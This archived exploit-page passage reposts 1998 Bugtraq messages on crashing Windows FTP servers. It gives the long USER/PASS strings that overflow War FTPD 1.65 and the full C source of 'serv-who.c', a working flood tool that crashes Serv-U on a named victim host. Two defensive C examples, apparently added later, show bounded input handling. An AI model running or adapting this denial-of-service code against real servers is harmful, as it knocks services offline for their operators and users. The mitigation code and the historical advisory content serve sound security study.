Many Windows FTP servers are not very robust

Summary
Description: This is an example of how to crash War FTPD 1.65 for Win 95/NT; you can do similar things with Serv-U and most other ftpd's I have seen.
Author: Well known, but here is a post to Bugtraq from rootshell
Compromise: crash the Windows ftpd
Vulnerable Systems: Those running Windows ftp servers
Date: 4 February 1997
Notes: I have appended a Serv-U crasher. Note that this may be the fault of Windows and not Serv-U.
Details


Date: Wed, 4 Feb 1998 12:49:42 -0600
From: Aleph One <aleph1@DFW.DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Windows 95/NT War FTPD 1.65 Buffer Overflow

From rootshell:

---------- Forwarded message ----------
Windows 95/NT War FTPD 1.65 Buffer Overflow
-------------------------------------------

The popular War FTPD daemon for Windows 95 and NT contains a very bad buffer
overflow that allows remote users to execute code on your stack or simply
crash the ftp server.

The overflow exists in many places including the USER and PASS phase.  To
exploit War FTPD you must connect to the FTP server (port 21) and issue the
following command :

USER xxxxxxxxxxxxxxxxxxxxxxxxxxxxx (very long string)

or

PASS xxxxxxxxxxxxxxxxxxxxxxxxxxxxx (very long string)

At this point the FTP daemon will crash.  We at Rootshell are not Windows
users and did not have the resources or time to write actual code to execute
on the stack, however it IS possible.

You may find War FTPD information at http://www.sidenet.com.br/jgaa/
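The defect class rootshell describes (an over-long USER or PASS argument crashing the server, or worse) comes from copying a client-supplied string into a fixed-size stack buffer without a length check. The code below is an added example, not from the rootshell post nor from War FTPD's source: it puts that unbounded pattern next to the bounded form a server should use. The buffer size USER_MAX and the names handle_user_unsafe, handle_user_safe and check_len are hypothetical, and the inputs are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the rootshell post nor War FTPD's source. It
 * assumes the server keeps the login name in a fixed stack buffer; the
 * names USER_MAX, handle_user_unsafe, handle_user_safe and check_len are
 * hypothetical and the inputs are constructed. */

#define USER_MAX 64   /* hypothetical size of the server's name buffer */

/* The defect class behind the reported crash: the USER argument is copied
 * into a fixed stack buffer with no length check. Anything longer than
 * USER_MAX - 1 bytes writes past name[] (undefined behaviour: at best the
 * crash rootshell saw, at worst a corrupted return address). Shown only to
 * contrast with the bounded version; never call it on untrusted input. */
int handle_user_unsafe(const char *arg)
{
    char name[USER_MAX];
    strcpy(name, arg);               /* the bug: no bound on the copy */
    return (int)strlen(name);
}

/* Bounded form: refuse the command when the argument cannot fit, then copy
 * exactly the bytes that were measured. Returns the accepted length, or -1
 * for an empty or oversized argument (the server should answer with a
 * 501 reply and may count the attempt against the client). */
int handle_user_safe(const char *arg)
{
    char name[USER_MAX];
    size_t len = strlen(arg);
    if (len == 0 || len >= sizeof name)
        return -1;
    memcpy(name, arg, len);
    name[len] = '\0';
    return (int)len;
}

/* Builds a constructed name of n 'x' characters (capped at 1023) and runs
 * it through the bounded handler, so the boundary can be probed directly. */
int check_len(size_t n)
{
    char buf[1024];
    if (n >= sizeof buf)
        n = sizeof buf - 1;
    memset(buf, 'x', n);
    buf[n] = '\0';
    return handle_user_safe(buf);
}

int main(void)
{
    printf("USER anonymous   -> %d\n", handle_user_safe("anonymous"));
    printf("USER x*63        -> %d\n", check_len(63));
    printf("USER x*64        -> %d\n", check_len(64));
    printf("USER x*300       -> %d\n", check_len(300));
    /* handle_user_unsafe(...) with any of the long names above would
       overflow name[]; that is exactly what the advisory reports. */
    return 0;
}
```

The point of measuring first and rejecting before copying is that the decision is made on the attacker-controlled length, not on whatever happens to be past the end of the buffer; a server that only truncates silently is safe from the overflow but still lets a client log in under a name it did not send.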
Date: Thu, 5 Feb 1998 01:01:59 -0500
From: whiz <whizpig@TIR.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: Windows 95 Serv-U FTP bug

Hello,
After reading an earlier message, Windows 95/NT War FTPD 1.65 Buffer
Overflow, I thought I might play around with some other Windows ftp
servers.  One problem I found was in Serv-U FTP by Cat-Soft
<http://www.cat-soft.com>.  After you connect, instead of sending the normal
USER then PASS, you can send garbage.  And if you send a lot of garbage at a
high speed Serv-U will stop responding to mouse clicks and after a short
amount of time will crash and give you this:

SERV-U32 caused a stack fault in module KERNEL32.DLL at 014f:bff9a08c.
Registers:
EAX=005e2084 CS=014f EIP=bff9a08c EFLGS=00000246
EBX=17bf0514 SS=0157 ESP=005e2080 EBP=005e20d4
ECX=005e2098 DS=0157 ESI=81628c70 FS=2347
EDX=ffffffff ES=0157 EDI=0000ffff GS=0000
Bytes at CS:EIP:
5e 8b e5 5d c2 10 00 64 a1 00 00 00 00 55 8b ec
Stack dump:
00000001 c00000fd 00000000 00000000 bff9a08c 00000000 01570157 01870028
17bf0b6a c10fabe8 16c70001 80dc0014 16e73a45 00040000 02000000 bff97fdc

Why it does this I have no idea.  It only acts this way in the Windows 95
version.  Under NT the CPU usage goes up to 100%, but no crash.  A lot of
times even after the crashed Serv-U has closed, Windows is still slow to
non-responsive.

And here is the program I used, not pretty but it works:


/*

        serv-who.c - 1998 - whiz
        kills Serv-U ftp on win95 boxes

        This program makes SERV-U32 cause
        a stack fault in module KERNEL32.DLL
        Sometimes after Serv-U crashes, windows
        becomes slow and non responsive,
        just an added bonus.  Another thing
        is that if the ftp is running on NT
        it usually won't crash, just raise
        CPU usage to 100% while the attack is
        running.

        Tested on:
        i586/100 - 72 meg RAM - crashed 5 times - Serv-U FTP-Server v2.3a
        i586/300 - 32 meg RAM - crashed 2 times - Serv-U FTP-Server v2.3b
        ?/? - ? meg RAM - crashed 2 times - Serv-U FTP-Server v2.3
        i586/233 - 32 meg RAM - crashed 1 time - Serv-U FTP-Server v2.2

        >>> Thanks to gen for helping me test this. <<<

        Another thing that might affect this
        program is how fast the serv-who
        computer's internet connection is.
        Or in other words how much faster is
        it than the victim's link.  A faster
        one will give a higher success rate.

        serv-who, like, who the hell are
        you going to serv now, you're crashed

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

int s, i, j, p;

/* the "garbage" sent in place of USER/PASS: one long run of 'X' */
const char *str =
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";

/* resolve the target (host name or dotted quad) and connect; 0 on success */
int open_sock(int sock, char *server, int port) {
     struct sockaddr_in blah;
     struct hostent *he;
     bzero((char *)&blah,sizeof(blah));
     blah.sin_family=AF_INET;
     blah.sin_port=htons(port);

    if ((he = gethostbyname(server)) != NULL) {
        bcopy(he->h_addr, (char *)&blah.sin_addr, he->h_length);
    }
    else {
         /* inet_addr() returns INADDR_NONE, not a negative value, on failure */
         if ((blah.sin_addr.s_addr = inet_addr(server)) == INADDR_NONE) {
           perror("gethostbyname()");
           return(-3);
         }
    }

        if (connect(sock,(struct sockaddr *)&blah,sizeof(blah))==-1) {
             perror("connect()");
             close(sock);
             return(-4);
        }
        printf("     Connected to [%s:%d].\n",server,port);
        return(0);
}


int main(int argc, char *argv[]) {
     /* the original sends were strlen(str)*N bytes read straight out of
        str, i.e. far past the end of the literal; the same sizes are kept,
        but they now come from a buffer that really is that large */
     static const size_t mult[] = {20,25,30,35,40,45,50,255,182,888,666};
     static const size_t add[]  = { 1, 2, 3, 4, 5, 4, 5,  4,  5,  4,  5};
     char *big;
     size_t len, biglen;

     if (argc != 3) {
       printf("serv-who.c - whiz\n\n");
       printf("kills serv-u ftp daemons\n\n");
       printf("Usage: %s <victim> <port>\n",argv[0]);
       exit(0);
     }
     printf("serv-who.c - whiz\n\n");
     if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket()");
        exit(-1);
     }
     p = atoi(argv[2]);
     if (open_sock(s,argv[1],p) < 0)
        exit(-1);

     len = strlen(str);
     biglen = len*888+5;                 /* the largest single send */
     if ((big = malloc(biglen)) == NULL) {
        perror("malloc()");
        exit(-1);
     }
     memset(big, 'X', biglen);
     /* once the far end dies, writing to the socket raises SIGPIPE;
        ignore it so send() fails with EPIPE and the loop ends cleanly */
     signal(SIGPIPE, SIG_IGN);

     printf("     Sending crap to %s on port %i... \n", argv[1], p);
     for (i=0; i<1000; i++) {            /* loop is REAL high, most likely
                                            it will exit with a "Broken Pipe"
                                            error before finishing the loop */
       if (send(s,big,len,0x0) < 0) break;
       for (j=0; j<22; j++) {            /* i just went crazy on the sends */
         size_t k = j % 11;              /* pay no attention to them */
         if (send(s,big,len*mult[k]+add[k],0x0) < 0) break;
       }
       if (j < 22) break;
     }
     if (i < 1000) perror("send()");
     printf("all done\n");
     close(s);
     free(big);
     return 0;
}
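What whiz's program exercises is not a memory-corruption bug but a missing resource bound: Serv-U kept absorbing bytes that never formed a command, with no cap on line length and no limit on how much nonsense one client may send. The reader below is an added example, not Serv-U's code and not part of whiz's post, of how a control-connection handler can bound both. It assumes a server that receives the control connection in arbitrary chunks; the constants LINE_MAX_BYTES and MAX_STRIKES, struct ctl_conn, feed_input and the scenario functions are hypothetical, and every input is constructed.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Added example, not Serv-U's code nor part of whiz's post. Assumes a server
 * that reads its control connection in arbitrary chunks; LINE_MAX_BYTES,
 * MAX_STRIKES, struct ctl_conn, feed_input and the scenario functions are
 * hypothetical names, and all inputs are constructed. */

#define LINE_MAX_BYTES 512  /* FTP command lines are short; cap what is buffered */
#define MAX_STRIKES    5    /* overlong or unparseable lines tolerated per client */

enum { CONN_OK = 0, CONN_DROP = 1 };

struct ctl_conn {
    char   line[LINE_MAX_BYTES];
    size_t used;        /* bytes buffered for the current line */
    int    discarding;  /* current line overflowed; skipping to the next LF */
    size_t discarded;   /* bytes skipped since the last strike */
    int    strikes;     /* budget consumed by bad input */
    int    commands;    /* well-formed command lines seen */
};

/* A well-formed FTP command begins with three or four letters followed by
 * a space or the end of the line. Everything else counts as garbage. */
static int looks_like_command(const char *l, size_t n)
{
    size_t i = 0;
    while (i < n && i < 4 && isalpha((unsigned char)l[i]))
        i++;
    if (i < 3)
        return 0;
    return i == n || l[i] == ' ';
}

static int strike(struct ctl_conn *c)
{
    c->strikes++;
    return c->strikes >= MAX_STRIKES ? CONN_DROP : CONN_OK;
}

/* Feed one received chunk. Memory stays fixed at sizeof(struct ctl_conn)
 * however much the client sends; once the strikes are used up the function
 * returns CONN_DROP and the caller closes the socket. */
int feed_input(struct ctl_conn *c, const char *buf, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        char ch = buf[i];
        if (ch == '\n') {
            if (!c->discarding) {
                size_t len = c->used;
                if (len > 0 && c->line[len - 1] == '\r')
                    len--;
                if (looks_like_command(c->line, len))
                    c->commands++;
                else if (strike(c) == CONN_DROP)
                    return CONN_DROP;
            }
            c->discarding = 0;
            c->used = 0;
            continue;
        }
        if (c->discarding) {
            /* still no terminator: each further LINE_MAX_BYTES costs a strike */
            if (++c->discarded >= LINE_MAX_BYTES) {
                c->discarded = 0;
                if (strike(c) == CONN_DROP)
                    return CONN_DROP;
            }
            continue;
        }
        if (c->used == sizeof c->line) {
            /* line too long: stop buffering, charge a strike, resync at next LF */
            c->discarding = 1;
            c->discarded = 0;
            c->used = 0;
            if (strike(c) == CONN_DROP)
                return CONN_DROP;
            continue;
        }
        c->line[c->used++] = ch;
    }
    return CONN_OK;
}

/* Verdict for a constructed byte stream delivered as a single chunk. */
int verdict_for(const char *stream, size_t n)
{
    struct ctl_conn c = {0};
    return feed_input(&c, stream, n);
}

/* Normal login then QUIT: returns the number of commands accepted, or -1
 * if the reader wrongly dropped the client. */
int run_normal_scenario(void)
{
    struct ctl_conn c = {0};
    const char *s = "USER anonymous\r\nPASS guest@\r\nQUIT\r\n";
    if (feed_input(&c, s, strlen(s)) != CONN_OK)
        return -1;
    return c.commands;
}

/* serv-who's pattern: a plausible start, then unterminated 'X' bytes in
 * large chunks. Returns CONN_DROP as soon as the byte budget is exhausted. */
int run_flood_scenario(void)
{
    struct ctl_conn c = {0};
    char flood[4096];
    const char *login = "USER anonymous\r\n";
    int verdict = feed_input(&c, login, strlen(login));
    memset(flood, 'X', sizeof flood);
    for (int k = 0; k < 100 && verdict == CONN_OK; k++)
        verdict = feed_input(&c, flood, sizeof flood);
    return verdict;
}
```

Two properties matter here. The per-connection state has a fixed size, so a client that streams data without ever sending a line terminator cannot grow the server's memory; and bad input is charged against a budget both per line and per LINE_MAX_BYTES of unterminated data, so a flood of the kind serv-who produces is disconnected within its first few kilobytes instead of being buffered until the process falls over.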

This page is part of Fyodor's exploit world.